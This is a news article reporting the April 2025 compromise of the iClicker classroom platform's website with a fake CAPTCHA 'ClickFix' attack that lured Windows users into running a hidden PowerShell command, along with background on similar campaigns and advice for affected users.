iClicker Website Hacked with Fake CAPTCHA in ClickFix Attack

Popular student engagement platform iClicker’s website was compromised with a ClickFix attack. A fake “I’m not a robot” check tricked users into installing malware. Learn who was affected and how to stay safe.

A popular digital classroom used in many universities, called iClicker, was recently targeted by hackers. This tool, owned by Macmillan, helps teachers track attendance and ask students questions in class. Millions of students and thousands of teachers across the US, including the University of Michigan and the University of Florida, use iClicker.

According to the University of Michigan’s Safe Computing Team’s advisory, between April 12th and 16th, 2025, the iClicker website was compromised, showing a fake CAPTCHA to the site’s visitors, and asking them to click “I’m not a robot.”

When a Windows user clicked on this fake check, a hidden PowerShell command was copied to their device. They were prompted to open a special window on their computer (by pressing the Windows key and the letter ‘R’ at the same time), paste this command (by pressing Ctrl and ‘V’), and then press Enter. Doing this would run the hidden command.

This trick, known as a ClickFix attack, is a way to fool people into downloading malware. A Reddit user tested this command on Any.Run and found it would connect to a server on the internet to download another set of instructions, depending on who was visiting the website. If it was a real person using a regular computer, the instructions would download malware, which could give the attacker complete control over the device.

This malware was likely designed to steal personal information, such as usernames, passwords, credit card details, and even cryptocurrency wallet information stored on the computer.

In case the visitor was a system used by security experts to analyze malware, the hidden command would instead download a harmless program from Microsoft so that the attackers could evade detection.

In its security bulletin, iClicker confirmed that its main system and user information were safe, explaining that a third party put a fake security check on their website before users logged in.

As previously reported by Hackread.com, ClickFix has become a growing concern in the cybersecurity world. In March 2024, we reported the increasing use of ClickFix attacks by cybercrime groups like TA571 and ClearFake. Later, in October 2024, security firm Sekoia observed more ClickFix attacks using fake Google Meet, Chrome, and Facebook pages to spread malware.

Recently, in April 2025, Hackread.com reported that government-backed hacking groups from countries like North Korea, Iran, and Russia used this method in their spying operations and even published a detailed blog post on how to protect yourself from ClickFix attacks.

iClicker advises anyone who visited their website between April 12th and 16th and clicked on the fake security check to immediately change all the passwords saved on their computer, including the iClicker password and use a password manager to maximize account security. People who only used the iClicker mobile app or did not see the fake security check were safe from this particular attack.

Debbie Gordon, CEO and Founder at Cloud Range commented on the development stating, “This incident shows how easily attackers can turn a simple user interaction, like clicking a CAPTCHA, into a full compromise.”

“The real question is: how quickly can your team detect and contain it? That’s the essence of incident response readiness. Simulation-based training gives defenders the muscle memory they need to spot behavioural red flags, investigate effectively, and coordinate containment actions in real-time before small lapses become major breaches.”